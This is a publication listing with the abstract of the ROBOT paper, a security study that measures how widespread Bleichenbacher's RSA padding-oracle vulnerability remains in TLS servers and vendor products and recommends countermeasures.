Re­turn Of Blei­chen­ba­cher’s Ora­cle Thre­at (ROBOT)

Hanno Böck, Juraj So­mo­rovs­ky, Craig Young

27th USE­NIX Se­cu­ri­ty Sym­po­si­um (USE­NIX Se­cu­ri­ty 18)

Ab­stract

in 1998 Blei­chen­ba­cher pre­sen­ted an ad­ap­ti­ve cho­sen-ci­pher­text at­tack on the RSA PKCS#1 v1.5 pad­ding sche­me. The at­tack ex­ploits the avail­a­bi­li­ty of a ser­ver which re­sponds with dif­fe­rent mes­sa­ges based on the ci­pher­text va­li­di­ty. This ser­ver is used as an ora­cle and al­lows the at­ta­cker to de­crypt RSA ci­pher­texts. Given the im­port­an­ce of this at­tack, coun­ter­me­a­su­res were de­fined in TLS and other cryp­to­gra­phic stan­dards using RSA PKCS#1 v1.5.

We per­form the first lar­ge-sca­le eva­lua­ti­on of Blei­chen­ba­cher's RSA vul­nerabi­li­ty. We show that this vul­nerabi­li­ty is still very pre­va­lent in the In­ter­net and af­fec­ted al­most a third of the top 100 do­mains in the Alexa Top 1 Mil­li­on list, in­clu­ding Face­book and Pay­pal.

We iden­ti­fied vul­nerable pro­ducts from nine dif­fe­rent ven­dors and open sour­ce pro­jects, among them F5, Ci­trix, Rad­wa­re, Palo Alto Net­works, IBM, and Cisco. These im­ple­men­ta­ti­ons pro­vi­de novel si­de-chan­nels for con­struc­ting Blei­chen­ba­cher ora­cles: TCP re­sets, TCP time­outs, or du­pli­ca­ted alert mes­sa­ges. In order to prove the im­port­an­ce of this at­tack, we have de­mons­tra­ted prac­tical ex­ploi­ta­ti­on by si­gning a mes­sa­ge with the pri­va­te key of facebook.​com's HTTPS cer­ti­fi­ca­te. Fi­nal­ly, we di­s­cuss coun­ter­me­a­su­res against Blei­chen­ba­cher at­tacks in TLS and re­com­mend to depre­ca­te the RSA en­cryp­ti­on key ex­chan­ge in TLS and the RSA PKCS#1 v1.5 stan­dard.

Tags: Blei­chen­ba­cher, side chan­nel, TLS